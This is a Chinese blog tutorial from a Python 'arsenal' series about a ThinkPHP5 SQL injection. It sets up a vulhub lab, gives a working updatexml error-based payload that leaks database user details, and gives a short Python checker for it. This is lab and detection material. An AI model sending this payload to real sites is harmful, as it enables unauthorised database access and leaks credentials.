Python武器库开发-武器库篇之Thinkphp5 SQL注入漏洞(六十六)

最新推荐文章于 2024-07-08 15:47:26 发布
最新推荐文章于 2024-07-08 15:47:26 发布
阅读量691 收藏 15
点赞数 24
分类专栏: Python武器库开发 文章标签: 网络安全 web安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/139933819
版权

Python武器库开发-武器库篇之Thinkphp5 SQL注入漏洞(六十六)

漏洞环境搭建

这里我们使用Kali虚拟机安装docker并搭建vulhub靶场来进行ThinkPHP漏洞环境的安装,我们进入 ThinkPHP漏洞环境,可以 cd ThinkPHP,然后通过 ls 查看可以搭建的靶场,目前 vulhub关于 ThinkPHP漏洞。可以搭建的靶场有五个。我们拿 in-sqlinjection 漏洞举例,如果我们想要安装 in-sqlinjection 漏洞环境,可以 cd 到 in-sqlinjection ,然后输入以下命令启动靶场环境:

docker-compose up -d

在这里插入图片描述

然后我们在浏览器输入 https://localhost:8083 就可以访问靶场环境

在这里插入图片描述

Thinkphp5 SQL注入漏洞原理

ThinkPHP 5 是一个开源的 PHP 框架,被广泛用于构建 Web 应用程序。然而,由于编码不规范或未经适当验证的用户输入数据,可能会导致 SQL 注入漏洞。

SQL 注入攻击是一种利用应用程序对用户输入数据的处理不当,导致恶意 SQL 代码被执行的攻击方式。攻击者通过在用户输入的数据中注入恶意的 SQL 代码,从而获得对数据库的访问权限或执行未授权的操作。

在 ThinkPHP 5 中,SQL 注入漏洞的主要原因是传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码。

Thinkphp5 SQL注入漏洞 POC

接下来我们给出Thinkphp5 SQL注入漏洞的POC,代码内容如下:

index.php?ids[]=1&ids[]=2
/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

我们像URL路径下添加POC就可以看到泄露的账户和密码:

在这里插入图片描述

Thinkphp5 SQL注入漏洞 POC编写

现在我们用python编写检测Thinkphp5 SQL注入漏洞的代码,内容如下:

#!/usr/bin/env python

import requests
from urllib.parse import urljoin

def thinkphp5_sqli(url):
    payload = urljoin(url,'/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1')
    response = requests.get(url=payload, verify=False)
    if 'XPATH syntax error' in response.text:
        print('漏洞存在')
    else:
        print('漏洞不存在')

if __name__ == '__main__':
    url = 'http://localhost:8083/'
    thinkphp5_sqli(url)

POC代码详细分析

这段代码是用于检测ThinkPHP 5框架的SQL注入漏洞。首先,代码导入了必要的库,包括requestsurllib.parse模块。然后,定义了一个名为thinkphp5_sqli的函数,该函数接收一个url参数。

函数主要通过构造一个特定的payload来检测目标URL是否存在漏洞。在payload中,使用了urljoin函数来构造一个URL,其中包含了一个恶意的SQL注入语句。具体来说,这个注入语句使用了updatexml函数来执行一些恶意的操作,比如获取当前用户。

然后,代码使用requests库发送一个GET请求,并将构造的payload作为url参数传递给请求。verify参数设置为False,表示不进行SSL验证。

最后,代码检查响应中是否包含了'XPATH syntax error'这个字符串。如果存在该字符串,说明目标URL存在SQL注入漏洞,输出"漏洞存在"。否则,输出"漏洞不存在"。

if name == 'main':部分,代码定义了一个默认的url为'http://localhost:8083/',并调用thinkphp5_sqli函数来检测该URL是否存在漏洞。可以根据需要修改默认的url参数来检测其他URL。

运行效果图

如下是我们这串代码的实际运行效果图:

在这里插入图片描述

怰月
关注
  • 24
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
10-25
主要介绍了对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析,对于网站安全十分重要!需要的朋友可以参考下
tp5-api-master_termjtv_thinkphp5_tp_system-master_
10-03
文章将深入探讨以ThinkPHP5为基础构建的“tp5-api-master_termjtv_thinkphp5_tp_system-master”项目,帮助读者理解其核心概念和技术要点。 一、ThinkPHP5框架简介 ThinkPHP5是基于PHP的轻量级MVC(Model-View...
think-wechat:企业微信SDK for ThinkPHP5
05-08
think-wechat企业微信SDK for ThinkPHP5,基于理论上支持 ThinkPHP 5.1.x 所有版本安装composer require pithyone/think-wechat配置创建配置文件将 vendor/pithyone/think-wechat/src/config.php 拷贝至应用配置目录...
thinkPHP5 tablib标签库自定义方法详解
10-19
主要介绍了thinkPHP5 tablib标签库自定义方法,结合具体实例形式分析了thinkPHP5标签库的定义、用法及相关注意事项,需要的朋友可以参考下
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8326
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
网络安全的神秘世界】SQL注入(下)
weixin_54750312的博客
07-04 1443
通过前面的SQL注入实验可以发现,字符型的注入点我们都是用单引号来判断的,但是当遇到 addslashes() 函数时,单引号会被转义,导致我们用来判断注入点的单引号失效。在将数据存入到了数据库中之后,开发者就认为数据是可信的。通过前面的学习可以了解到,SQL注入非常关键的一步就是让引号闭合和跳出引号,无法跳出引号,那么输入的内容就永远在引号里,即永远是字符串,无法实现SOL注入。出现了语法错误,意味着输入的内容会到数据库中进行查询,接下来的步骤就很简单了,跟前面的报错注入是一样的。
印尼网络安全治理能力观察
网络研究观
07-05 1055
这不是第一次,而且很可能也不会是最后一次。
从资金到未来:技术融资如何重塑IT顾问在AI与网络安全的角色?
07-07 461
一方面是人工智能 (AI) 和机器学习 (ML) 的双引擎,另一方面是网络安全和数据泄露威胁中不断变化的威胁形势,IT 格局正在经历翻天覆地的变化。这场数字革命对 IT 顾问来说既是挑战也是机遇,但要成功驾驭它,需要不断学习和技能发展。这就是 IT 顾问的技术资金成为游戏规则改变者的地方,为这些高需求领域的职业发展提供了关键的燃料。全球格局虽然重点一直放在成熟国家的技术资金上,但认...
网络安全(黑客)自学
白帽子凯哥聊黑客
07-02 987
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
【黑龙江网络安全等级保护测评报告】
weixin_62641226的博客
07-08 147
黑龙江信息安全等级保护测试报告》(简称“等保测试报告”),是黑龙江地区按照有关信息安全等级保护的有关规范与要求,对其进行了安全性评价并编制的一份报告。4. 安全性评测成果:从物理安全网络安全、应用安全、数据安全以及管理安全等角度,对测评中存在的安全问题和缺陷进行了详尽的分析。5. 安全性风险评估:对所检测到的安全性问题进行风险评价,并对其可能产生的损害以及对该信息系统的影响程度进行分析。1.系统综述:对所要评价的信息系统进行了简单的介绍,包括系统的名称,功能,运行环境,网络体系结构等。
医疗器械网络安全| 常见安全漏洞与防护措施
最新发布
网 安 云
07-08 406
通过加强代码审查和安全测试、采用安全设计原则和最佳实践、加强网络安全保护、实施严格的访问控制、建立安全监控和响应机制、关注并遵循相关标准和规范以及加强安全培训和意识提升等措施,可以有效防止医疗器械软件被攻击和滥用,为患者提供更加安全可靠的医疗服务。
网络安全设备——探针
Nove1205的博客
07-04 1002
网络安全中的探针是什么?
哈尔滨等保测评标准的国际比较与启示
2301_79527080的博客
07-08 183
结语哈尔滨等保测评标准与国际信息安全标准的比较,不仅展示了不同标准间的共通之处,也揭示了各自的侧重点和优势。哈尔滨作为东北地区重要的经济和科技中心,其信息安全等级保护(简称“等保”)测评标准在确保本地企业信息安全的同时,也面临着与国际标准接轨的需求。哈尔滨企业应以此为契机,结合自身情况,吸收国际标准的精华,不断优化信息安全管理体系,为企业的全球化战略奠定坚实的基础。• 数据保护:在个人数据的处理上,哈尔滨企业需参照GDPR的高标准,加强对数据隐私的保护,尤其是在跨境数据传输过程中,确保符合相关的国际法规。
网络安全筑基——反序列化漏洞
weixin_55762309的博客
06-27 1038
反序列化漏洞原理详解
网络安全概述
m0_73065213的博客
07-01 1070
安全模型是用于精确地和形式地描述信息系统的安全特征,以及用于解释系统安全相关行为的理由。
网络安全】Host碰撞漏洞原理+工具+脚本
等风来
07-05 167
如果其中任何一个组合成功(例如:http://192.168.1.1 with Host: example.com),说明IP地址192.168.1.1存在Host碰撞漏洞,可以通过伪造Host字段访问虚拟主机example.com的资源。如上图,请求www.baidu.com时,服务器通过该字段来确定处理www.baidu.com这个虚拟主机的请求,然后下发资源。如果Web服务器没有正确验证HTTP请求中的Host字段的值,则可以通过伪造或修改Host字段,访问其他虚拟主机上的资源。
2024年 春秋杯 网络安全联赛夏季赛 Web方向 题解WirteUp 部分
Jay17的博客
07-08 779
2024年 春秋杯 网络安全联赛夏季赛 Web方向 题解WirteUp 部分
thinkphp防止sql注入例子
06-03
为了防止SQL注入攻击,ThinkPHP提供了多种方法,例如参数绑定、数据类型检测、预处理语句等。下面是一个使用参数绑定的例子: ``` $username = input('post.username'); $password = input('post.password'); $user = Db::query('select * from users where username = ? and password = ?', [$username, $password]); if ($user) { // 登录成功 } else { // 登录失败 } ``` 上面的代码中,`$username`和`$password`是从`POST`请求中获取的,然后使用参数绑定的方式将它们绑定到SQL语句中,这样可以避免SQL注入攻击。另外,还可以使用`Db::execute`方法来执行预处理语句,例如: ``` $username = input('post.username'); $password = input('post.password'); $sth = Db::execute('select * from users where username = ? and password = ?', [$username, $password]); if ($sth->rowCount()) { // 登录成功 } else { // 登录失败 } ``` 预处理语句会在执行前进行编译,可以有效地防止SQL注入攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值